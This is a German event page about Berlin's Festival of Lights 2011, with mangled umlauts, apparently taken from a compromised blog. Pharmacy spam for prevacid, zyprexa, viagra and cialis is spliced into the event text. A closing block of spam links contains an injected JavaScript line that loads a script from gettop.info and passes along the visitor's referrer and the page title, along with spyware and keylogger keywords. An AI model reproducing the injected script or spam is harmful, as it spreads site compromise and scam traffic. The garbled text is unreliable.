Festival of Lights 2011

Festival of Lights 2011

Setzt auch in diesem Jahr wieder spektakulA�re leuchtende Akzente. Vom 12. bis 23. Oktober 2011 verwandelt das Festival of Lights die Metropole erneut in eine glitzernde, farbenprA�chtige Stadt.
generic prevacid online Das Festival of Lights hat sich zu einem der bedeutendsten internationalen Public Events inA�Berlinentwickelt. Zahlreiche Illuminationen und Veranstaltungen verwandeln die deutsche Hauptstadt fA?r knapp zwei Wochen in eine glitzernde Metropole. A?ber 70 Wahrzeichen, PlA�tze, GebA�ude oder Kunstwerke wie z.B. das Brandenburger Tor, der Berliner Dom, der Funkturm und der Fernsehturm werden mit Licht, Events oder Projektionen in Szene gesetzt. ?purchase olanzapine zyprexa online

WA�hrend des gesamten Festivals kann die Stadt aufA�demLand-, Luft- und Wasserweg erkundet werden. Zu den MA�glichkeiten des LightSeeings gehA�rt eine Tour mit dem LightLiner-Bus entlang der illuminierten Wahrzeichen Berlins. AuAYerdem kann der Besucher an einer Spreefahrt auf dem beleuchteten LightShip teilnehmen, fA?r eine schnelle Verbindung zwischen den SchauplA�tzen des Festivals stehen LightVelo-Taxis bereit.

Wo: Mehr als 70 verschiedene Bauwerke, StraAYen und PlA�tze der Hauptstadt.

Weitere Informationen unter www.festival-of-lights.de oder am Info-Point in den Potsdamer Platz-Arkaden einholen.

Adresse:

Festival-Zentrum:

Potsdamer Platz 1

10785A�A�Berlin

Karl Meyer kmart-pharmacy-generic-d.... kmj radio ads viagra. http://qarikhushimuhammadalazhari.org/?p=1893 where to buy cialis in cape town buy pills s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; Order http://www.nygatan16.se/?p=5124 delivery alliance ohio Cheap Pills mobile spy, android keylogger, how can i monitor snapchat indocin in labor and delivery pills online where to buy periactin

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>